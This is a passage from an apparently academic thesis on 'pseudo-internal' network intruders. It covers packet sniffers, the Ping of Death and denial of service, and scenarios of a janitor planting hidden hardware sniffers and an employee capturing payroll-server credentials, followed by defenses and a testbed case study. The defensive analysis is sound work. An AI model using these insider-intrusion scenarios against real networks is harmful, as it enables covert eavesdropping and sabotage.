network. In contrast to network assessment tools that scan packet headers, packet sniffers are used to read and record the contents of the packet. Dumb packet sniffers simply collect the packets and store them in memory for a human to later examine the raw data. There are, however, intelligent packet sniffers that are programmed to look for particular pieces of information such as network account names and passwords. Often these intelligent sniffers simply discard packets that do not appear to contain the particular information for which the sniffer is searching. For this reason, intelligent packet sniffers can run longer before human intervention is required because they store information more selectively, recording less than the total amount of information passing the sniffer. Dumb packet sniffers must be periodically checked or swapped out or else the memory will become full and new packets will either be discarded or written over already stored packets. The frequency with which the dumb sniffer must be checked depends on the memory available to the sniffer and the volume of network traffic on the target system. The Pseudo-Internal Intruder 27 Packet sniffers can either be programs run on a normal computer attached to the network (software sniffers) or autonomous devices built only to analyze network traffic (hardware sniffers). Hardware sniffers are much more expensive, but have the advantage of being completely passive. Because it is custom designed, the hardware sniffer can analyze passing traffic without producing any output at all. This lack of output is unlike a computer running a software sniffer because the computer will often have to register itself with the network or have its own unique network identifier even to receive packets (having an IP address is an example of this in a IP based network). A highly skilled pseudo-internal intruder can create a software sniffer that is totally passive (like a hardware sniffer), but this requires a customizable operating system, like Linux, and a high degree of knowledge about operating systems as well as pseudo-internal intrusion techniques. 3. An exploit consists of the steps required to take advantage of a given vulnerability in a network device (router, hub, etc.) or a machine. An intruder must perform certain actions to successfully attack a target machine or device. These actions are usually sequential and can be thought of as a series of steps. By executing the correct steps in the correct order, a vulnerability can be exploited. The Ping of Death attack is one example of an exploit. It was found that sending an abnormal sized (very large) ping packet to machines running the operating system Windows95 would crash the machine. The following steps are required to execute the Ping of Death exploit: Intruder discovers the IP address of the machine to be attacked. Intruder sends an oversized ping packet to the target IP address. Targeted machine crashes upon receipt of the oversized ping packet. The Pseudo-Internal Intruder 28 While a rather simple exploit, the Ping of Death is very effective against machines that have not been updated with the Microsoft security patch that eliminates the Ping of Death problem. 4. Denial of service attacks are those that degrade the functionality of one or more machines by preventing the machines from communicating over the internal network. These are not direct attacks against target machines, but indirect attacks against the machines’ ability to communicate. For example, the Ping of Death is not a denial of service attack since it directly targets a vulnerability in a machine’s operating system. Denial of service attacks are popular because they require less skill than exploiting vulnerabilities and are extremely difficult to defend against. The attacker does not have to determine the vulnerabilities of a target machine’s software and what steps are require to exploit those vulnerabilities. From a functional viewpoint, denying the target machine the ability to provide service to other machines is the equivalent of taking the machine down by gaining control of it. Recall that any distributed system has a functionality policy that dictates the purpose of the system. If a denial of service attack prevents the distributed system from fulfilling its purpose, then the pseudo-internal intruder has succeeded. There are two types of denial of service attacks: network saturation, and traffic misdirection. Network saturation is the process of flooding the network with useless traffic so that legitimate requests for service can not reach the target machine. This is the easiest type of denial of service attack, as it only requires access to the network configuration, of which the target machine is a node. While there are different methods The Pseudo-Internal Intruder 29 of network saturation, the most common is to direct a machine on the same internal network as the target machine to continuously output packets. Traffic misdirection is the interception or diverting of network traffic intended for the target machine. One example of traffic misdirection is IP spoofing. IP spoofing is a process by which an intruder convinces other computers on the network that his or her machine is in fact the target machine. In this way no request for service is ever received by the target machine. IP spoofing does, however, require more technical expertise than network saturation. Certain exploits and denial of service attacks have been automated in hacker programs. Hacker programs are computer programs that attack target machines by attempting preprogrammed exploits or denial of service attacks. The advantage of such a program to a pseudo-internal intruder is that very little knowledge of the exploit steps or vulnerabilities is required of the user. The user simply directs the program to attack certain machines and it takes action accordingly. The disadvantage is that hacker programs are usually only preprogrammed with one or two exploits or denial of service attacks. Hacker programs will not be effective if the targeted machine does not have any of the exact vulnerabilities for which the hacker program has exploits or denial of service attacks. An example of a hacker program is WinNuke for Windows. WinNuke attempts the Ping of Death exploit against any number of machines as directed by the user. All the user has to do is install the program and direct it to attack a machine. No knowledge of the Ping of Death packet size or what commands are used to send a Ping of Death packet is required. The Pseudo-Internal Intruder 30 It is also important to note why pseudo-internal intruders can use these four tools and techniques more effectively than external intruders can. In each case, security provided by the network perimeter defenses prevents external intruders from effectively using these tools and techniques. Network assessment tools and packet sniffers are not effective from outside the network perimeter of a target system because the bulk of packets transmitted over a network are not intended for destinations outside of the network perimeter and are not transmitted outside the network perimeter. Network perimeter defenses, like firewalls, only permit packets intended for destinations in the outside world to cross the network perimeter. With only the traffic intended for the outside world to sample from, network assessment tools and packet sniffers would only be marginally useful. Network perimeter defenses are also often configured to reject the queries of active network assessment tools. This prevents active network assessment tools from gathering any information about the internal network. These same network perimeter defenses would prohibit denial of service attacks or exploits against any device inside the network perimeter. Any time a firewall detects a critical volume of traffic targeted for the internal network, it simply refuses to pass on that traffic. Such an attack would prevent other machines in the outside world form communicating with the distributed system, but machines inside the network perimeter would not be prevented from communicating with the target machine or any other machine inside the network perimeter. While there are other tools and techniques used by intruders, these four categories are the only ones that apply to pseudo-internal intruders [Bou98]. A pseudo-internal intruder has two choices upon gaining access to a distributed system: listen to the system The Pseudo-Internal Intruder 31 (read) or try to effect some change upon the system (write). If the pseudo-internal intruder chooses to listen to the system then he or she can either read the headers of packets (assessment tools) or the body of packets (sniffers). If the pseudo-internal intruder decides to attack the system then he or she can either attack the machines on the network (exploits) or the network itself (denial of service attacks). New pseudo-internal intruder tools and techniques will surely be developed in the future, but they will fall into one of the above four categories characterized by reading or writing. 2.2 Dangers of the Pseudo-Internal Intruder Pseudo-internal intruders have two main courses of action: proactive and passive. Proactive actions create normal or excessive network traffic. The nature of these actions is to actively seek out information or effect some change on the network. Passive actions are those that contribute little or no network traffic to a distributed system’s internal network. By nature these actions attempt to contribute no traffic at all, but in some cases passive actions add small amounts of network protocol oriented traffic to the distributed system. For example, some protocols may require a machine to register its presence in order to communicate on the network. When the Dynamic Host Configuration Protocol (DHCP) is in use on a network, each computer must request an IP address from the DHCP server. The DHCP server grants a ‘lease’ to the requesting computer for a specific IP address. This exchange creates a small amount of network protocol oriented traffic. While it is possible for a highly skilled pseudo-internal intruder to avoid such protocol traffic, many potential intruders with pseudo-internal access will not be able to avoid The Pseudo-Internal Intruder 32 these small amounts of protocol traffic. Such traffic is, however, so minimal that it should not be considered proactive. A passive pseudo-internal intruder is limited to harvesting information passing through that segment of the network configuration on which the intruder is located. In order to gather this information, passive pseudo-internal intruders can only utilize tools that generate little or no network traffic such as packet sniffers and passive network assessment tools. Such information may be the actual data traveling over the network or it may contain clues about the details of the network configuration itself. Although there are not many different passive actions, the act of harvesting information can compromise the security of a distributed system. The data itself may be private or the information gained about the network configuration can lead to the discovery of vulnerabilities in the system. Passive actions are not available to the traditional external intruder since network perimeter defenses would prevent the escape of any information not intended for recipients outside the network perimeter. While it is possible for an internal intruder to utilize user account privileges to harvest information it is not really a passive action since the utilization of a user account creates normal network traffic. There is a greater chance that an internal intruder, rather than a passive pseudo-internal intruder, would be detected harvesting information because many intrusion detection systems that monitor user activity would detect the effects of a user running network assessment tools. The following example scenario of an intrusion will illustrate the danger represented by a pseudo-internal intruder using only passive actions. The main character in this example is an industrial espionage agent paid to covertly steal proprietary business information from a competitor. The agent believes that such information can be found in The Pseudo-Internal Intruder 33 the competitor’s distributed system. For information to be of value to the agent’s employer, the competitor can not know that such proprietary information has been stolen. Otherwise the competitor may pursue legal action or purposely invalidate the stolen information. The phrase target system will be used as a reference to any distributed system that is the attack target of any particular intruder being discussed. The agent therefore decides to forgo the risk of testing the network perimeter defenses of the target system and attempts to gain direct access to the network configuration. The agent is able to get a job as a custodian for a janitorial service that cleans the office building that houses the target system. While the agent’s new employee status does not grant access to restricted areas like server rooms, it does provide access to several closets that contain hubs and wiring for the target system’s network. These ‘wiring closets’ provide the agent with direct access to the physical configuration, and therefore the network configuration, of the target system without having to cross the network perimeter and contend with any network perimeter defenses. Because the agent’s goal is to gather proprietary information without being detected, he or she connects a hardware packet sniffer to the hub in one of the wiring closets. Depending on the style of the packet sniffer, it can be connected to an open port on the hub or coupled around a cable leading to the hub. The agent is able to cleverly hide the sniffer and leaves it there for several days. During this time the hardware sniffer records any packet that is transmitted on the segment which that particular hub is connected to. Since the hardware sniffer has a finite amount of memory in which to store the packets, the agent periodically replaces the hardware sniffer with another. The agent can then take each hardware sniffer to another location to examine the captured packets at The Pseudo-Internal Intruder 34 will. While the agent could leave a hardware sniffer in place indefinitely (simply switching them every few days), the choice is made to remove all hardware sniffers after a particularly critical high level communication is intercepted. The termination of the agent’s operation further decreases the chance that the owners of the target system will ever realize that proprietary information has been compromised. Soon after the removal of the hardware sniffer, the agent quits the janitorial service citing unhappiness with the job. The above industrial agent is an example of an outsider passive pseudo-internal intruder. This agent has accomplished the mission of compromising the target system while avoiding any perimeter defense (unlike an external intruder) and not using any user permissions at all (unlike an internal intruder). The entire attack consisted of passive actions that would likely go unnoticed by system administrators. Expensive hardware sniffers, like the one used by the espionage agent, can easily be designed to create no additional network traffic, while recording all passing network traffic. Recall that most software sniffers running on computers (cheaper than custom built hardware sniffers) create a small amount of network traffic that could be detected by system administrators. Other pseudo-internal intruders are willing to accept the risk of proactive actions. This allows the proactive pseudo-internal intruder a wider range of options including denial of service attacks, exploiting the vulnerabilities of machines on the network, use of hacker programs, and proactive network assessments. The character in the next scenario is a disgruntled data entry specialist, an unhappy employee working for the owners of the target system. This employee is angry about a lack of compensation. The situation has led the employee to attempt to disrupt the target system in contrast to the previously The Pseudo-Internal Intruder 35 mentioned example of an attempt to gather confidential information from a target system. The disgruntled employee will serve as an example of a proactive pseudo-internal intruder. The employee has decided to attack the computer responsible for payroll on the day that payroll checks are to be created. Although this employee does not have physical access to any areas like server rooms or wiring closets, he or she still has access to several network jacks where computers in the office are connected to the network. That office connection provides the employee with direct access to the internal network of the target system while circumventing any network perimeter defenses. Each office not only contains personal desktop computers for most employees, but several computers that are shared among all employees in each office. The shared machines require no user account since they are intended for word processing and Internet research, but not for users to log in to the network. In order to access shared network printers and the Internet, the shared machines are connected to the network and running the correct protocol stack for the network. Therefore, the machines can communicate on the network regardless of whether a user is logged in or not. In case any of his or her actions are detected, the employee decides to use one of the shared machines in the office. Since many different employees have access to the shared machine, it would be difficult for system administrators to connect any suspicious traffic coming from the shared machine to any single employee. The disgruntled employee begins the intrusion by running a network assessment tool on the shared machine, in order to gather information about the target system’s network configuration. The anonymity provided by using a shared machine encourages The Pseudo-Internal Intruder 36 the employee to direct the network assessment tool to conduct a proactive assessment. Preliminary information from the network assessment provides the IP address and name of the payroll server by intercepting traffic from the server. Such information allows the employee to direct the assessment tool to proactively gather information on that single machine. Focusing on a single machine decreases the amount of network traffic and hence, the likelihood that network assessment traffic will be detected by system administrators. The result from the network assessment tool is a detailed picture of the payroll server, including what services (FTP, Telnet, etc.) and versions of software and services the machine is running, and to what network nodes the machine communicates with and how often. Furthermore, assume that the assessment tool intercepted several user accounts and passwords transmitted over the network when users remotely logged into the payroll machine. One of those captured accounts was that of a user with administrative rights on the payroll machine. Such a user is a type of a local system administrator for that single machine. It is clear that, so far, the disgruntled employee can not be considered an external or internal intruder. The employee has not used any user privileges thus far, nor did the employee have to contend with any perimeter defenses. At this point it is possible that the employee will become an internal intruder by masquerading as the payroll server administrator mentioned above. The employee will likely be able to use the permissions of that account to delete everything on the payroll server. Such a move would likely destroy the data required to create payroll checks for that week. If the system administrator account had not been captured, the employee could continue to be a proactive pseudo-internal intruder and attempt to gain control of the machine by The Pseudo-Internal Intruder 37 exploiting some of the vulnerabilities that the assessment tool found. Yet another possibility would be to launch denial of service attacks against the machine to prevent it from communicating with other machines in the manner necessary to gather payroll data. The disgruntled employee scenario involves a single intruder having access to a distributed system that places the intruder in more than one access oriented intruder category. In this example, a pseudo-internal intruder harvested system administrator account information that would have allowed the intruder to log in as the system administrator. The disgruntled employee would still have the access of a pseudo-internal intruder, even after logging in as a system administrator and gaining access reserved to internal intruders. It is possible for a given intruder to start with or obtain more than one type of access to a target system, thus placing the intruder in more than one access oriented intruder category. Any intruder with more than one type of access (external, internal, pseudo-internal) to a distributed system is a multi-category intruder. The multi-category intruder is not a new concept brought about by the introduction of a third category to the traditional internal and external pair of intruder categories. For example, if an Internet hacker (external intruder) discovered a user account name and its password, then the hacker could log in to the target system as that user. Once logged in, the external Internet hacker would be taking advantage of user privileges, thus granting the hacker the access of an internal intruder. This use of user privileges would not eliminate the fact that the Internet hacker was still also outside the network perimeter of the system with the access of an external intruder. Since this example does not involve a pseudo-internal intruder, it appears that multi-category intruders exist whether one chooses to distinguish intruders by two or three categories. The Pseudo-Internal Intruder 38 This issue of multi-category intruders does, however, not affect the definition, detection, or defense against pseudo-internal intruders. Any intrusion against a target system can be connected to a primary form of access, which is the access actually used to complete the intrusion. Several of our examples illustrate such primary forms of access. Although the disgruntled employee captured the system administrator password using pseudo-internal access to the target system, if the employee attacked the payroll machine using the privileges of the administrator account then the employee is acting as an internal intruder. The attack on the payroll machine would be defined as an internal intrusion, and defending against the attack would require protection mechanisms designed to counter internal intruders. Likewise, assume for a moment that the disgruntled employee did not use the administrator account, and instead launched a denial of service attack against the payroll machine. That denial of service attack could not be defined as an internal intrusion since no user account was used. The attack would be a proactive pseudo-internal intrusion and would require defenses designed to thwart pseudo-internal intruders. The next section will describe the detection and defenses against such pseudo-internal intruders. The Pseudo-Internal Intruder 39 Chapter 3: Security Recommendations 3.1 Defending Systems Against the Pseudo-Internal Intruder One of our purposes in defining the category of pseudo-internal intruders is to provide a carefully defined framework in which to discuss defending systems against a pseudo-internal intruder. Most of the data gathered on network intrusion incidents indicates that internal intruders are responsible for the majority of network security incidents [Pow99]. In a recent survey of financial institutions the most expensive incident reported was the result of an internal intruder. One bank spent over 2 million dollars tracking down what they assumed to be an ‘Internet hacker’ that had stolen intellectual property only to find out it was a disgruntled employee [Mei99]. In actuality, many times that internal intruders are referred to, the statement applies to pseudo-internal intruders as well. For example, a recent network security incident at a Chinese bank was widely reported as an ‘internal’ or ‘insider’ job, when the intruders actually used pseudointernal tools and techniques [Reu98a, Reu98b]. The defense of systems against pseudointernal (and internal) intruders is clearly of growing importance. As network perimeter defenses get stronger, and they will, more intruders will be forced to attempt to circumvent the network perimeter defenses and utilize pseudo-internal tools and techniques. It is also important to explicitly examine defenses against pseudo-internal intruders since such defenses are so different from the average defenses used to combat internal or external intruders. Common intrusion detection systems designed to defend against internal intruders examine usage patterns of user accounts. These packages seek to discover unauthorized activity by existing user accounts since internal intruders The Pseudo-Internal Intruder 40 utilizing user accounts to attack a target system. Clearly, such packages designed to defend against internal intruders will have no effect against intruders that do not utilize user accounts (pseudo-internal intruders). Likewise, common external intruder intrusion detection systems do not affect the pseudo-internal intruder since the focus is on preventing the external intruder from penetrating the network perimeter. Since the pseudo-internal intruder is already inside the network perimeter, such network perimeter defenses do not detect or defend against pseudo-internal intruders. There are three steps to consider when attempting to protect a system against potential intruders: denying an intruder access to the distributed system, mitigating the consequences if an intruder does gain access to the distributed system, and detecting, monitoring, and recording any intrusions. Recall that, by definition, a pseudo-internal intruder has to have access to the digital pathways of communication that are part of the network configuration. Because the pseudo-internal intruder is our primary concern, this section will first address the issue of denying intruders access to the network configuration of a distributed system. Denial of access to the network configuration would entirely eliminate the possibility of pseudo-internal intruders from the system. We know, however, that experts caution against assuming that any defensive actions will totally preclude intruders from gaining access to a system. Therefore, we will secondly address the issue of minimizing the effect of pseudo-internal intruders who do gain access to the network configuration. Lastly, the issue of detecting, monitoring, and recording pseudo-internal intrusions will be addressed. The combination of these three steps provides an effective overall security strategy to defeat the pseudo-internal intruder. The Pseudo-Internal Intruder 41 Prevention of access to the network configuration has two aspects: perimeter defenses and physical configuration control. The objective of perimeter defenses is to stop as many intruders as possible at the perimeter in order to deny them access to any part of the distributed system. We will only be concerned with physical perimeter defenses since pseudo-internal intruders entirely circumvent network perimeter defenses. While network perimeter defenses play a vital role in distributed system security, they do not protect against threats already inside the network perimeter and have no bearing on a discussion about pseudo-internal intruders. Since there is a distinct possibility that perimeter defenses will fail in stopping all intruders, it is necessary to protect each component of the network configuration from unauthorized access. Physical configuration control is any process by which the owners of a distributed system ensure that no unauthorized hardware can be introduced to the physical configuration and that authorized hardware is not used for unauthorized actions. In effect, physical configuration control places some type of barrier around each component of the physical configuration to prevent intruders from accessing such components or adding their own pieces of hardware to the configuration. Such a barrier to unauthorized use can include security measures like frequent inspections as well as traditional physical and digital barriers. The second step in the overall system defense against pseudo-internal intruders is limiting the abilities of pseudo-internal intruders that do gain access to the network configuration by adequately controlling the network configuration. Network configuration control is the manner in which the network configuration is managed to ensure the highest degree of security, while complying with functionality requirements. The Pseudo-Internal Intruder 42 Remember that the network configuration not only includes all of the hardware of the physical configuration and the avenues of digital communication, but the protocols used for communication, and the way that communication is segmented. The network configuration not only dictates the path communication follows, but how nodes in the distributed system are allowed to communicate. By correctly managing such protocols, network attributes, and segmentation, system administrators can make it more difficult for pseudo-internal intruders to utilize and gather information from the network configuration. The ways in which network configuration control can be practiced will be further explained in the next section. There is always the possibility that all attempts to deny pseudo-internal intruders access to the network configuration will fail. Successful pseudo-internal intrusions should be identified and located as soon as possible. The process of network configuration monitoring, the last piece of overall system security, continuously observes all aspects of the network configuration searching for evidence of intruders. Successful monitoring of the network configuration will alert system administrators to take immediate action to prevent further damage to the distributed system. The following sections will further explain each of the three steps of defending a distributed system against a pseudo-internal intruder. Additionally, examples of each method of defense will be offered to illustrate ways in which the method can be implemented. The Pseudo-Internal Intruder 43 3.2 Defending the Distributed System: Preventing Intruder Access Since chain link fences and armed guards do not contain any programs or data communication ports, physical perimeter defenses are theoretically one of the easiest and straightforward forms of computer security. In practice, physical perimeter defenses are, however, one of the hardest forms of security to implement effectively. Typically, the more restrictive physical perimeter defenses are, the less efficient any workforce hampered by such physical perimeter security policies becomes. For example, only allowing system administrators access to areas with machines (the most secure physical perimeter defense) would not allow other employees to utilize the system (totally ineffective workforce). Few physical configurations of large, practical distributed systems reside within a physical perimeter that does not also contain the offices of many employees and users of the system. The other practical drawback to physical perimeter defense is that many of the possible pseudo-internal intruders have legitimate reasons to cross the physical perimeter. Both example scenarios involved such insider pseudointernal intruders. When the industrial espionage agent took a job as a legitimate custodian, he or she was entitled to access within the physical perimeter of the target system. While the agent’s duplicity may have eventually been discovered, the gambit of being hired as a custodian provided sufficient time to compromise the target system. Likewise, the disgruntled employee certainly was entitled to access within the physical perimeter of the target system. It would be unrealistic to expect a physical perimeter defense to not only prevent access by unauthorized persons, but also to also prevent access by authorized persons planning on committing unauthorized actions, while still allowing harmless authorized persons access. The Pseudo-Internal Intruder 44 Physical configuration control is the second aspect of preventing pseudo-internal intruders from gaining access to any part of a distributed system’s network configuration. Recall that any practical physical perimeter defense will still allow legitimate employees, and those successfully masquerading as legitimate employees, access to the facilities housing the target system. To prevent intruders who are able to cross the perimeter from accessing the network configuration, physical configuration control measures protect each component of the physical configuration to further decrease the chance of unauthorized access. With respect to physical configuration control, components of the physical configuration can generally be broken down into three groups: avenues of communication (network cabling), communication facilitators (network devices), and end points (workstations and servers). Each of these types of components has a unique manner in which it can be individually protected. Running network cabling through some type of conduit is one way to protect it. Lead conduit is normally used because lead is an excellent inhibitor of signals. Lead conduit makes it more difficult for pseudointernal intruders to use devices to monitor the traffic on encased network cabling. Additionally, conduit that had been breached would be more easily observable to those inspecting the physical configuration for signs of tampering or unauthorized devices. For fiber optic network cables there are more advanced solutions like motion detectors and devices that monitor any disturbances of the fiber optic cable [Gri95]. Network devices can be protected by locking the device in metal casing if located in a relatively insecure area like a wiring closet. Like encasing network cable in lead conduit, securing the network device would make it more difficult for pseudo-internal The Pseudo-Internal Intruder 45 intruders to monitor signals going in or out of the network devices, or to connect unauthorized devices to the network configuration. Lastly, the workstations and servers must also be encased against monitoring and unauthorized use. Since it is unrealistic to have all machines encased in metal, it is possible to require that all desktop computers have power-on passwords and screen saver passwords to prevent anyone but the designated user of that machine from using it to gain access to the network configuration. Power-on passwords require the user of a machine to enter a password before the machine will perform any function, including booting the operating system or accessing the floppy disk drive. Computers can be configured so that a screen saver activates any time that the computer is not in use for a certain period of time (usually 5-15 minutes). A screen saver password requires the user to enter a password before the screen saver will deactivate and allow the machine to be used again. Measures can also be taken to ensure that all hardware complies with the Transient Electromagnetic Pulse Emanation Standard (TEMPEST). Without taking special precautions, intruders can gather information by monitoring the electromagnetic emanations coming from hardware. TEMPEST technology can be used to prevent intruders from being able to remotely gather information from network hardware. There may, however, be legal implications depending on the country in which the network is setup. A good explanation of TEMPEST, including both offensive and defensive aspects and legal issues, can be found in [Eck85] and [Sel90]. Physical configuration control not only utilizes barriers to protect each component of the physical configuration, but also is the process by which that protection is inspected and monitored for violations. In this way, physical configuration control ensures that no The Pseudo-Internal Intruder 46 barrier to unauthorized access has been violated and no unauthorized devices added to the physical configuration. Verification of physical configuration integrity is usually achieved by educating the users of the system not to introduce unauthorized hardware and continuously inspecting the physical configuration for unauthorized hardware. If any unauthorized device is found it is either removed or receives the appropriate security measures. This kind of inspection of the physical configuration aids in the discovery and removal of unauthorized devices like packet sniffers that may have been placed in the physical configuration by pseudo-internal intruders. Such inspections also address the problem of rogue outside connects. Recall that rogue outside connects are created when unauthorized hardware is added to the physical configuration. Such unauthorized hardware can create an outside connect unbeknownst to the system administrators. These unauthorized outside connects do not have network perimeter defenses and are rogue outside connects. Physical configuration control inspections identify unauthorized hardware. In this way, any rogue outside connect discovered is either removed or becomes a normal outside connect protected by network perimeter defenses. 3.3 Defending the Distributed System: Mitigating Intruder Access Network configuration control measures are designed to make it more difficult for a pseudo-internal intruder with access to the system to execute a successful attack. If network configuration control measures prevent a pseudo-internal intruder from listening to information (reading) from the target system or affecting change (writing) on the target system, then there is little the pseudo-internal intruder can do. The Pseudo-Internal Intruder 47 Therefore, the first aspect of network configuration control is designing the configuration so that information is available to as few as possible unintended recipients (prevent unauthorized listening). This can be done either by encapsulating information so that unintended recipients cannot read it, or by preventing the information from reaching unintended recipients. One way of encapsulating information, is to design an encryption scheme for all information traveling over the network of the distributed system. One possibility is to have hardware link encryptors that automatically encrypt and decrypt packets as they travel through a certain length of network cabling. This might be useful for areas where there was a higher possibility of intruders gaining access to network cabling. Another option would be to have all information encrypted between end-points (workstations or servers). This method of encryption would allow messages to be sent that only the intended recipients can decrypt. Of course, this introduces the question of key management which is outside the scope of this paper. The main disadvantages to encryption are the cost, network latency, and implementation difficulties. A good treatment of the problems, costs, and intricacies of encryption and public key management can be found in [Den99] and [Sch96]. [And93] and [AN96] specifically address common reasons why the implementation of cryptosystems fail. A less expensive method of eliminating the availability of information to unintended recipients of any given packet, is to configure the network into smaller network segments. Recall that using routers, a system administrator can have packets passed on to only a small group of nodes that contains the machines of the actual recipients. In many network protocols, each packet has a header with information about that packet’s destination. Unlike hubs that simply pass on packets to everything The Pseudo-Internal Intruder 48 connected to the hub, routers can examine the destination information of a packet and only pass that packet on in the direction(s) for which it is intended. While this does mean that every node on the same segment as the intended destination will receive a copy of the packet, this is more desirable than every node in the entire network configuration receiving a copy of the packet. This means that pseudo-internal intruders that are sniffing the network for packets will only receive packets intended for a node on the segment to which the intruder is connected. The other aspect of network configuration control is preventing unauthorized communication over the network. Most network protocols have some method of uniquely identifying potential recipients of network traffic. Any device that communicates with other network devices must have one of these unique identifiers. Therefore, the identifiers themselves can be managed in order to control which devices can communicate on the network. For example, in an IP based network, all machines must have an IP address in order to receive network traffic. There are methods of managing these IP addresses from a central location in a manner that system administrators control whether a machine gets an IP address at all, and if so, what IP address. This makes it more difficult for pseudo-internal intruders to connect unauthorized devices to the network configuration and then run proactive scanning utilities. Without a valid IP address, the unauthorized device would not be able to receive the responses required for a proactive scan. In fact, even running a passive scan without a valid IP address requires either a much more expensive and rare hardware packet sniffer or a specially designed and configured operating system running a software sniffer, as opposed to the common software packet sniffer running on a personal computer. The Pseudo-Internal Intruder 49 While a pseudo-internal intruder might correctly guess a usable IP address, system administrators have a list of all authorized IP address if an IP address management scheme is in use on that distributed system. The next section will explain how system administrators can use such a list to monitoring the network for potential pseudo-internal intruders. 3.4 Defending the Distributed System: Detecting Intruder Access We know that none of these security measures will entirely eliminate the possibility of a pseudo-internal intruder gaining access to a target system. It is therefore critical that the system administrator have timely knowledge of any pseudo-internal intrusions. Knowledge of the existence of an intruder would allow system administrators to perhaps apprehend the intruder, feed the intruder misinformation, or in the very least, eliminate the intruder’s access to the target system. Network configuration monitoring can provide system administrators with the needed warnings of pseudo-internal intruder activities. Network configuration monitoring includes checking for unauthorized or incorrectly used unique identifiers (required to communicate on the network), querying the network for unauthorized devices (the digital equivalent to visually inspecting the physical configuration), and observing the status and presence of network devices that should be present in the network configuration. There are a variety of technical ways to actually monitor the network configuration depending on its architecture. In a TCP/IP based network the unique identifiers are the IP addresses. The sender and recipient IP addresses contained in each The Pseudo-Internal Intruder 50 packet’s header can be compared against a list of approved IP addresses to ensure that only authorized devices are communicating over the network. The network can also be scanned for unauthorized MAC addresses. A MAC address is a unique number assigned to each piece of network hardware by the manufacturer. The vast majority of network devices can be queried to report that device’s MAC address. System administrators can keep a list of the MAC address of all authorized devices and then compare the results of system wide queries to that list. Lastly, there are multiple ways to query a network device to see if it is ‘alive’ or still operating and connected to the network. There are several possible situations when a pseudo-internal intruder may need to disconnect a network device to either gain access to the network configuration, or perhaps borrow that device’s IP address (since no two devices can have the same IP address). So, if a network device disappears from the network, even for a short period of time, system administrators may want to physically check the status of that device. No defensive measure listed here is a singular solution to the problem of the pseudo-internal intruder. Each measure narrows the possibility of a successful pseudointernal intrusion. The measures do, however, represent an effective approach when all of the measures are implemented for a distributed system. Note that the majority of the suggestions for defending a distributed system against pseudo-internal intruders are costeffective and require little extra hardware and software. These techniques can, however, be combined with commercial intrusion detection systems for even more security. While it seems certain that future pseudo-internal intruders will develop techniques not considered by us, these techniques will still operate in the domain of a target system’s network configuration. Access to the network configuration by The Pseudo-Internal Intruder 51 unauthorized persons is prevented by physical perimeter defenses, network perimeter defenses, physical configuration control, and network configuration control. Network configuration monitoring provides warnings to system administrators of authorized persons committing unauthorized pseudo-internal intruder activities, and any unauthorized persons that somehow gained access to the distributed system. The Pseudo-Internal Intruder 52 Chapter 4: Case Study 4.1 Introduction The purpose of the case study was to illustrate the threat that a pseudo-internal intruder represents to an average distributed system and how to mitigate this threat. The case study had two phases. In the first phase, a set of pseudo-internal intruder attacks was executed against a distributed system using common state of practice network security. The results of the attacks and the ability of the system to detect the attacks were recorded to illustrate how vulnerable the common network is to a pseudo-internal intruder. The state of practice in network security is that a distributed system has adequate to exceptional network perimeter defenses, but very few security measures devoted to the detection of intruders within the network perimeter. A recent survey of security practitioners in corporations, government agencies, and educational institutions showed that out of 501 respondents only 42 utilized any form of internal intrusion detection; as opposed to the 91 respondents utilizing firewalls [Pow99]. Even those distributed systems that do have some sort of intra-network perimeter intrusion detection usually check for authorized users committing unauthorized actions. This commonly implemented type of internal intrusion detection does little to protect against pseudointernal intruders because the detection systems examine the use of user accounts. The second phase of the case study executed the same set of pseudo-internal intruder attacks against the same distributed system. However, in the second phase of the case study the network security recommendations of this thesis were implemented prior to executing the attacks. The results of the attacks and the ability of the system to detect the attacks were recorded in both phases. The benefits of the security recommendations The Pseudo-Internal Intruder 53 will be apparent by analyzing the differences between the results of the two phases of the case study. 4.2 The Target System The invasive nature of some pseudo-internal intruder attacks required that the case study be done on a testbed distributed system, as opposed to an active real world system. For example, it would not be feasible to execute a denial of service attack against an operational distributed system, since system functionality would be degraded. Although it was not possible to build a testbed distributed system as large as many real world systems, an attempt was made to build a testbed distributed system that was representative of a large real world system. Node Name Description OAS Operational Administration Server Operational Windows98 1 (Operational) Workstation 2 Operational Windows98 1 (Operational) Workstation 3 Mission Critical Linux 2.2 2 (Mission Critical) Database Server Mission Critical Windows95 2 (Mission Critical) Database Workstation Table 4-1: Nodes in Testbed Distributed System OWk2 OWk3 MCDS MCDW Operating System Linux 2.2 Segment (when applicable) 1 (Operational) Our testbed network had 5 nodes, 2 hubs, a router, and a firewall. The equipment was widely varying: nodes running multiple operating systems (Linux, Windows95, and Windows98) and network devices from different vendors (ODS Networks, and Cabletron). Additionally, the networking devices used were capable of supporting a much larger network. The router was a 10 Gigabit per second capable Cabletron 6500 The Pseudo-Internal Intruder 54 SmartSwitch with modules supporting Gigabit Ethernet, ATM, and Fast Ethernet. The network configuration diagrams (figures 4-1 and 4-2) are drawn to show “the rest of the network” cloud, which could contain many more nodes. The testbed distributed system was divided into two halves: an operational group connected to hub OP (Operational), and a mission critical group connected to hub MC (Mission Critical). Node OAS (Operational Administration Server) was running Linux 2.2 and was the machine used by the system administrator of the target system. Node OWk2 was a Windows98 operational workstation. Node OWk3 was another Windows98 operational workstation with an unauthorized modem attached. That unauthorized modem was connected to an outside phone line creating a rogue outside connect. Node MCDS (Mission Critical Database Server) was also running Linux 2.2. Node MCDW (Mission Critical Database Workstation) was running Windows95. Any communication to or from a mission critical node was considered to be mission critical communication. To simulate the activity of a distributed system, several communication activities were executed during each of the pseudo-internal intruder attacks. Nodes MCDS and MCDW communicated with each other. Node OAS communicated with node MCDS. Lastly, the user of node OWk3 connected to a pop mail server external to the testbed distributed system to retrieve mail messages. Having a user from one node establish a connection with another node and send a text file to that node simulated mission critical communication. Each text file contained “Mission Critical Information” as the first line and then information stating who the message was from and for whom it was intended. For the purposes of the case study, each pseudo-internal intruder attack had the goal of either intercepting or disrupting mission critical communication. Intercepting The Pseudo-Internal Intruder 55 user account names and passwords was a secondary goal. Pseudo-internal intruder attacks came from two different sources: the unauthorized laptop connected to hub OP, and the rogue outside connect created by the unauthorized modem on node OWk3. Both of these attack sources are plausible real world possibilities. The previously mentioned industrial espionage agent posing as a janitor could potentially gain access to a wiring closet containing a hub. Likewise, an unwitting employee could connect a modem to an office machine in order to be able to dial up from home and check e-mail without having to purchase Internet service at home. Figure 4-1: Network Configuration of Phase 1 Testbed System The Pseudo-Internal Intruder 56 As mentioned, the testbed distributed system in the first phase of the case study was designed to represent the state of common practice in terms of network security measures. The firewall was configured to let no outside traffic 